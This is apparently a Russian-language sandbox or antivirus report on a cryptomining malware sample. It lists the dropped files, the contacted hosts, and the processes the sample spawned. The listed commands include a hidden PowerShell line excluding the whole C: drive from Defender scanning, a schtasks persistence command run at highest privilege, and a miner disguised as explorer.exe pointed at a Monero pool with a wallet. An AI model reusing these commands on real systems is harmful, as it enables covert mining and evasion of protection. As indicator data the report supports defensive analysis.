Техническая информация
- <SYSTEM32>\tasks\update
- %WINDIR%\explorer.exe
- %LOCALAPPDATA%\winupdate\service.exe
- 'ht##bin.org':80
- 'ca####.discord.com':443
- http://ht##bin.org/ip
- 'ca####.discord.com':443
- DNS ASK ht##bin.org
- DNS ASK ca####.discord.com
- '%LOCALAPPDATA%\winupdate\service.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (со скрытым окном)
- '%WINDIR%\explorer.exe' --donate-level 0 --max-cpu-usage 75 -o xmr.2miners.com:2222 -u 45VVwbB9eWQagHoXWirLqQ9FP3Y5rqd14LzFSXQi2NFpEDLsjiAV6TXUwDgCo2S7zHJEvFetPdHPVCdiftc5JgZxJdYyB9D -p x' (со скрытым окном)
- '%LOCALAPPDATA%\winupdate\service.exe' ' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn update /rl HIGHEST /tr %LOCALAPPDATA%\WinUpdate\service.exe
- '%WINDIR%\explorer.exe' --donate-level 0 --max-cpu-usage 75 -o xmr.2miners.com:2222 -u 45VVwbB9eWQagHoXWirLqQ9FP3Y5rqd14LzFSXQi2NFpEDLsjiAV6TXUwDgCo2S7zHJEvFetPdHPVCdiftc5JgZxJdYyB9D -p x
- '<SYSTEM32>\taskeng.exe' {379520BE-471A-472B-90A5-9BEA7D676F89} S-1-5-21-1960123792-2022915161-3775307078-1001:tyreujobrzo\user:Interactive:[1]